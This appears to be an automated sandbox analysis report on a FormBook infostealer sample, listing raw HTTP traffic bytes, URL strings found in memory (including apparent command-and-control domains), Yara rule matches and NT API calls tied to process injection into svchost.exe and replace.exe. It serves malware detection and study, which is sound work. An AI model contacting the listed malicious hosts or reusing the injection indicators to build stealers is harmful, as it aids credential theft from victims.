7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 68 0c 20 b4 ec 2a d3 f7 5c c7 53 75 4b d7 d6 f1 a5 2f 02 e5 36 4a 61 34 46 bb 9e 52 98 68 a0 3a 8e 6c 94 a4 eb 96 44 2f 50 1b b9 b8 2c 9e 21 47 91 6f da 61 88 49 26 fd 1d 2c 24 6b bd 21 21 99 ef 99 f8 b3 ba 5c 12 a4 41 28 6c 80 f9 ad 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba 7e fe c2 b9 4b e7 d6 8f 59 47 b6 1c af e3 6f 99 51 20 ed fe 1a 37 b8 e8 cb 8e 68 88 8d 91 67 47 8e ef 55 aa 57 af af 1c b1 8e 5d be dc 3c 66 d5 ad 74 90 74 30 81 c5 a1 79 a3 34 7f 98 4a d9 1a 48 cf d9 50 61 64 be 1b 96 ab 25 b4 57 41 e0 07 87 ec 50 13 cb e8 13 06 76 a3 54 1c 08 76 c9 ec 3c 8a 36 d8 ce cf 2c 17 81 06 a6 23 8d 84 87 96 6d b6 53 51 be 99 ba 83 64 b4 34 62 db 7e 67 9c 61 bb 6d 0c 61 2b a1 ff b5 c8 7c ad 14 af 5c c6 c8 9d 7c 6a b5 bb 2d d7 e9 f6 22 e0 81 c6 52 41 71 1c 6e dc 6a a5 15 34 e4 54 89 1e 3d 45 7d c7 d9 5c d8 d5 f0 fc 88 44 8a d4 15 4c 14 7f 1d ef c5 8f e2 9d f8 b1 88 bf 8d ef 24 ef e3 e3 bd 78 37 f9 20 b9 81 cf bb f8 dd 8b b7 e3 3b 54 bd bd e4 b5 c3 e1 4a 1d fe a8 3d b7 6d 10 6a 33 ac f6 a2 68 18 9e b5 2c b8 9f 09 07 d6 ce e0 f9 1b be eb fa 5b c2 f3 fd a1 02 4a f0 01 7e 00 b4 a8 00 78 96 41 97 dc ba d5 86 df f7 21 cc df 68 76 33 79 3f b9 59 b7 64 b3 6e 61 1d cd fa cc 62 ba aa d5 4a 7d dd d8 0a e4 70 88 41 53 05 cf 96 b7 d8 17 5b f0 05 10 c3 c2 46 6c 96 9e 1f 46 a0 11 23 8c 64 e4 d8 30 c0 cc ac 53 ba 36 d2 f9 c9 4e cb 13 6d cc 58 c4 60 6a 28 2d 64 8e de 72 b3 3e 5c dc bb a3 34 8e e1 ac cf 6e ad 7a 3b 68 c6 bb da 60 f1 13 b2 64 fc 84 ad fb 60 9f 3d a7 94 3e 5c b4 f0 f6 28 8a 7c 2f cc 34 8e 95 17 60 a0 2b 21 a5 fe 00 33 b8 7e d0 62 3b 2b cf 26 b0 a5 15 a1 f3 9e 6a 01 01 03 e9 b2 39 52 ad e6 fd 73 0d a6 ed d9 34 e0 e5 c2 10 43 d9 e9 c0 50 2d 97 b0 33 8b 3d 22 69 8d 3f 6b ab e7 3b a1 b5 6a f7 94 dd 6f 2c 75 38 58 cc e7 f0 25 39 18 ae a0 57 2b f4 47 81 ad 1a 99 10 c4 ce a5 e6 6f 68 1c 42 a3 28 ae 98 9c a7 b8 02 a6 ef 82 4f 1e bc a2 8e 3f 90 4e 4e f2 99 e3 14 84 d7 0d 2c 4f 6d 59 ab a3 68 90 49 b6 40 7e 6a 41 91 66 34 c8 64 5f a2 22 1b eb 92 4e d7 6b 84 50 96 d7 69 61 b4 83 97 1a ff 03 e0 f8 6f bc 23 92 8f e2 bd e4 93 e4 a6 88 ef 67 ec 70 b4 e0 90 e1 50 7a 73 70 3
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 13:57:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 68 0c 20 b4 ec 2a d3 f7 5c c7 53 75 4b d7 d6 f1 a5 2f 02 e5 36 4a 61 34 46 bb 9e 52 98 68 a0 3a 8e 6c 94 a4 eb 96 44 2f 50 1b b9 b8 2c 9e 21 47 91 6f da 61 88 49 26 fd 1d 2c 24 6b bd 21 21 99 ef 99 f8 b3 ba 5c 12 a4 41 28 6c 80 f9 ad 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba 7e fe c2 b9 4b e7 d6 8f 59 47 b6 1c af e3 6f 99 51 20 ed fe 1a 37 b8 e8 cb 8e 68 88 8d 91 67 47 8e ef 55 aa 57 af af 1c b1 8e 5d be dc 3c 66 d5 ad 74 90 74 30 81 c5 a1 79 a3 34 7f 98 4a d9 1a 48 cf d9 50 61 64 be 1b 96 ab 25 b4 57 41 e0 07 87 ec 50 13 cb e8 13 06 76 a3 54 1c 08 76 c9 ec 3c 8a 36 d8 ce cf 2c 17 81 06 a6 23 8d 84 87 96 6d b6 53 51 be 99 ba 83 64 b4 34 62 db 7e 67 9c 61 bb 6d 0c 61 2b a1 ff b5 c8 7c ad 14 af 5c c6 c8 9d 7c 6a b5 bb 2d d7 e9 f6 22 e0 81 c6 52 41 71 1c 6e dc 6a a5 15 34 e4 54 89 1e 3d 45 7d c7 d9 5c d8 d5 f0 fc 88 44 8a d4 15 4c 14 7f 1d ef c5 8f e2 9d f8 b1 88 bf 8d ef 24 ef e3 e3 bd 78 37 f9 20 b9 81 cf bb f8 dd 8b b7 e3 3b 54 bd bd e4 b5 c3 e1 4a 1d fe a8 3d b7 6d 10 6a 33 ac f6 a2 68 18 9e b5 2c b8 9f 09 07 d6 ce e0 f9 1b be eb fa 5b c2 f3 fd a1 02 4a f0 01 7e 00 b4 a8 00 78 96 41 97 dc ba d5 86 df f7 21 cc df 68 76 33 79 3f b9 59 b7 64 b3 6e 61 1d cd fa cc 62 ba aa d5 4a 7d dd d8 0a e4 70 88 41 53 05 cf 96 b7 d8 17 5b f0 05 10 c3 c2 46 6c 96 9e 1f 46 a0 11 23 8c 64 e4 d8 30 c0 cc ac 53 ba 36 d2 f9 c9 4e cb 13 6d cc 58 c4 60 6a 28 2d 64 8e de 72 b3 3e 5c dc bb a3 34 8e e1 ac cf 6e ad 7a 3b 68 c6 bb da 60 f1 13 b2 64 fc 84 ad fb 60 9f 3d a7 94 3e 5c b4 f0 f6 28 8a 7c 2f cc 34 8e 95 17 60 a0 2b 21 a5 fe 00 33 b8 7e d0 62 3b 2b cf 26 b0 a5 15 a1 f3 9e 6a 01 01 03 e9 b2 39 52 ad e6 fd 73 0d a6 ed d9 34 e0 e5 c2 10 43 d9 e9 c0 50 2d 97 b0 33 8b 3d 22 69 8d 3f 6b ab e7 3b a1 b5 6a f7 94 dd 6f 2c 75 38 58 cc e7 f0 25 39 18 ae a0 57 2b f4 47 81 ad 1a 99 10 c4 ce a5 e6 6f 68 1c 42 a3 28 ae 98 9c a7 b8 02 a6 ef 82 4f 1e bc a2 8e 3f 90 4e 4e f2 99 e3 14 84 d7 0d 2c 4f 6d 59 ab a3 68 90 49 b6 40 7e 6a 41 91 66 34 c8 64 5f a2 22 1b eb 92 4e d7 6b 84 50 96 d7 69 61 b4 83 97 1a ff 03 e0 f8 6f bc 23 92 8f e2 bd e4 93 e4 a6 88 ef 67 ec 70 b4 e0 90 e1 50 7a 73 70 3
            Source: replace.exe, 00000004.00000002.3172177851.0000000003948000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000033B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://sppsuperplast.online/becc/?EjLdUJJ=NMCgl399tF1pJwA6An/WBP0ajP560ZE7ZZq
            Source: GmuPchEfAM.exe, 00000008.00000002.3172358807.0000000005136000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.les-massage.online
            Source: GmuPchEfAM.exe, 00000008.00000002.3172358807.0000000005136000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.les-massage.online/74ou/
            Source: replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: replace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
            Source: replace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap-icons
            Source: replace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css
            Source: replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: replace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.4.1.min.js
            Source: replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: replace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: replace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Heebo:wght
            Source: replace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
            Source: replace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://htmlcodex.com
            Source: replace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://htmlcodex.com/credit-removal
            Source: replace.exe, 00000004.00000002.3167953756.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.c
            Source: replace.exe, 00000004.00000002.3167953756.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: replace.exe, 00000004.00000002.3167953756.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: replace.exe, 00000004.00000003.1669081673.00000000073CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: replace.exe, 00000004.00000002.3167953756.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: replace.exe, 00000004.00000002.3167953756.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: replace.exe, 00000004.00000002.3167953756.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: replace.exe, 00000004.00000002.3167953756.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.3172358807.00000000050E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3169852732.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3169964546.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1489720857.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3167311472.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1488814205.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3172358807.00000000050E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3169852732.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3169964546.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1489720857.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3167311472.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1488814205.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C473 NtClose,2_2_0042C473
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B735C0 NtCreateMutant,LdrInitializeThunk,2_2_03B735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B60 NtClose,LdrInitializeThunk,2_2_03B72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03B72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03B72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74340 NtSetContextThread,2_2_03B74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73090 NtSetValueKey,2_2_03B73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73010 NtOpenDirectoryObject,2_2_03B73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74650 NtSuspendThread,2_2_03B74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BA0 NtEnumerateValueKey,2_2_03B72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B80 NtQueryInformationFile,2_2_03B72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BF0 NtAllocateVirtualMemory,2_2_03B72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BE0 NtQueryValueKey,2_2_03B72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AB0 NtWaitForSingleObject,2_2_03B72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AF0 NtWriteFile,2_2_03B72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AD0 NtReadFile,2_2_03B72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B739B0 NtGetContextThread,2_2_03B739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FB0 NtResumeThread,2_2_03B72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FA0 NtQuerySection,2_2_03B72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F90 NtProtectVirtualMemory,2_2_03B72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FE0 NtCreateFile,2_2_03B72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F30 NtCreateSection,2_2_03B72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F60 NtCreateProcessEx,2_2_03B72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EA0 NtAdjustPrivilegesToken,2_2_03B72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E80 NtReadVirtualMemory,2_2_03B72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EE0 NtQueueApcThread,2_2_03B72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E30 NtWriteVirtualMemory,2_2_03B72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DB0 NtEnumerateKey,2_2_03B72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DD0 NtDelayExecution,2_2_03B72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D30 NtUnmapViewOfSection,2_2_03B72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D10 NtMapViewOfSection,2_2_03B72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D10 NtOpenProcessToken,2_2_03B73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D00 NtSetInformationFile,2_2_03B72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D70 NtOpenThread,2_2_03B73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CA0 NtQueryInformationToken,2_2_03B72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CF0 NtOpenProcess,2_2_03B72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CC0 NtQueryVirtualMemory,2_2_03B72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C00 NtQueryInformationProcess,2_2_03B72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C60 NtCreateKey,2_2_03B72C60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C84340 NtSetContextThread,LdrInitializeThunk,4_2_02C84340
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C84650 NtSuspendThread,LdrInitializeThunk,4_2_02C84650
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C835C0 NtCreateMutant,LdrInitializeThunk,4_2_02C835C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82AD0 NtReadFile,LdrInitializeThunk,4_2_02C82AD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82AF0 NtWriteFile,LdrInitializeThunk,4_2_02C82AF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82BE0 NtQueryValueKey,LdrInitializeThunk,4_2_02C82BE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_02C82BF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_02C82BA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82B60 NtClose,LdrInitializeThunk,4_2_02C82B60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C839B0 NtGetContextThread,LdrInitializeThunk,4_2_02C839B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82EE0 NtQueueApcThread,LdrInitializeThunk,4_2_02C82EE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_02C82E80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82FE0 NtCreateFile,LdrInitializeThunk,4_2_02C82FE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82FB0 NtResumeThread,LdrInitializeThunk,4_2_02C82FB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82F30 NtCreateSection,LdrInitializeThunk,4_2_02C82F30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_02C82CA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82C60 NtCreateKey,LdrInitializeThunk,4_2_02C82C60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_02C82C70
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82DD0 NtDelayExecution,LdrInitializeThunk,4_2_02C82DD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_02C82DF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82D10 NtMapViewOfSection,LdrInitializeThunk,4_2_02C82D10
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_02C82D30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C83090 NtSetValueKey,4_2_02C83090
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C83010 NtOpenDirectoryObject,4_2_02C83010
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82AB0 NtWaitForSingleObject,4_2_02C82AB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82B80 NtQueryInformationFile,4_2_02C82B80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82EA0 NtAdjustPrivilegesToken,4_2_02C82EA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82E30 NtWriteVirtualMemory,4_2_02C82E30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82F90 NtProtectVirtualMemory,4_2_02C82F90
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82FA0 NtQuerySection,4_2_02C82FA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82F60 NtCreateProcessEx,4_2_02C82F60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82CC0 NtQueryVirtualMemory,4_2_02C82CC0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82CF0 NtOpenProcess,4_2_02C82CF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82C00 NtQueryInformationProcess,4_2_02C82C00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82DB0 NtEnumerateKey,4_2_02C82DB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C83D70 NtOpenThread,4_2_02C83D70
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82D00 NtSetInformationFile,4_2_02C82D00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C83D10 NtOpenProcessToken,4_2_02C83D10
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_00159120 NtAllocateVirtualMemory,4_2_00159120
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_00158CE0 NtCreateFile,4_2_00158CE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_00158E40 NtReadFile,4_2_00158E40
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_00158F30 NtDeleteFile,4_2_00158F30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_00158FD0 NtClose,4_2_00158FD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0093F97A NtSetContextThread,4_2_0093F97A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004184532_2_00418453
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029202_2_00402920
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012402_2_00401240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032002_2_00403200
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EAE32_2_0042EAE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024102_2_00402410
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FCAA2_2_0040FCAA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FCB32_2_0040FCB3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004045C42_2_004045C4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026102_2_00402610
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041662E2_2_0041662E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004166332_2_00416633
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FED32_2_0040FED3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DF532_2_0040DF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B8739A2_2_03B8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C003E62_2_03C003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F02_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF132D2_2_03BF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA3522_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2D34C2_2_03B2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B452A02_2_03B452A0
